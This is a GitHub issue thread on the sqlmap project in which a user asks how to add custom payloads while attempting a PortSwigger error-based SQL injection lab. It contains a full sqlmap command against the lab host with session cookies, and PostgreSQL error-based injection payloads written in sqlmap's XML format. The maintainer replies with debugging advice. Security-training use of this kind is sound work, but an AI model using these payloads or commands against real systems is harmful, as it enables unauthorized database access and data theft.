search

sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
32.69k stars 5.73k forks source link

Need More Payloads into Sqlmap's Arsenal #5787

Closed Gill1000 closed 2 months ago

Gill1000 commented 2 months ago

Need more payloads or how to add custom paylaods in xml files, I tried to add payload from ghauri https://github.com/r0oth3x49/ghauri/blob/main/ghauri/common/payloads.py

To be specific i m trying to solve burp Lab: Visible error-based SQL injection with Sqlmap, In all previous labs sqlmap did found injection successful, but not in this one, I m using --technique=E and --dbms=postgresql to save time. this was my original command

sqlmap -u "https://0a7a0024036043e082c59c7700cc0059.web-security-academy.net:443/filter?category=Pets" --cookie="TrackingId=VK0rw53WAfJ3M493; session=NzzWUBD47aOlV5WZllNOzeJmo8kHcVq7" --random-agent --ignore-code=400,401,403,500 -p "TrackingId" --threads 2 --dbs --batch --dbms=postgresql --technique=E

I even tried with Error based payload for Postgresql from ghauri (from line 1611-1653) by converting into xml format (did took some help from chatgpt but still thinks its something wrong). here is xml:

PostgreSQL error-based - Parameter replace 2 1 1 1,2,3,9 3 AND 9141=CAST(((CHR(114)||CHR(48)||CHR(111)||CHR(116)||CHR(104)||CHR(51)||CHR(120)||CHR(52)||CHR(57)||CHR(126)))||[INFERENCE]::text||(CHR(126)||CHR(69)||CHR(78)||CHR(68)) AS NUMERIC) AND 9141=CAST(((CHR(114)||CHR(48)||CHR(111)||CHR(116)||CHR(104)||CHR(51)||CHR(120)||CHR(52)||CHR(57)||CHR(126)))||1337::text||(CHR(126)||CHR(69)||CHR(78)||CHR(68)) AS NUMERIC) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
PostgreSQL 
<test>
    <title>PostgreSQL error-based - Parameter replace (GENERATE_SERIES)</title>
    <stype>2</stype>
    <level>5</level>
    <risk>1</risk>
    <clause>1,2,3,9</clause>
    <where>3</where>
    <vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
    <request>
        <payload>(CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
    </request>
    <response>
        <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
    </response>
    <details>
        <dbms>PostgreSQL</dbms>
    </details>
</test>

long story short, how to add effective payloads in xml's file I also did checked closed issues to get more info but coudnt found!! while creating custom payload xml, i did checked sqlmap xml's file for payload writing format

let me know if i m doing something wrong.

Thankyou in Advance!! @stamparm

stamparm commented 2 months ago

you should definitely run everything with -v 5 OR -t traffic.txt and inspect the server's responses. if you are expecting error-based SQLi, then you should get more than informative messages from the server if you try to send these kind of payloads